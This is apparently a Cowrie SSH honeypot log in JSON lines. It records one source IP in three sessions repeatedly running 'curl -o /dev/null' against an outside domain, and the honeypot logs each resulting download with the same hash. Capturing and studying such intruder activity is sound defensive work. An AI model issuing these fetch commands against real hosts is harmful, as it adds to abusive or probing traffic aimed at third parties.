{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.896820Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.923865Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.925603Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.927927Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.928908Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.929619Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.932006Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.933330Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.937739Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.938461Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.979714Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.980674Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.985976Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.987308Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.988216Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.992203Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.993908Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.998864Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.003208Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.008037Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.042878Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.043689Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.046060Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.047447Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.053559Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.055919Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.057940Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.058983Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.059652Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.110718Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.112316Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.112935Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.115319Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.115934Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.118867Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.146893Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.148806Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.149483Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.154871Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.155584Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.161029Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.161821Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.193105Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.195087Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.197731Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.198952Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.199692Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.203019Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.204906Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.205809Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.211391Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.212216Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.216165Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.244825Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.248630Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.252380Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.253106Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.282303Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.283401Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.285280Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.286553Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.289490Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.292282Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.293672Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.294276Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.297240Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.324158Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.327464Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.330123Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.331325Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.335211Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.336114Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.338441Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.339335Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.371091Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.374643Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.376687Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.377886Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.380018Z","src_ip":"212.227.125.160","session":"9f264c568782"}
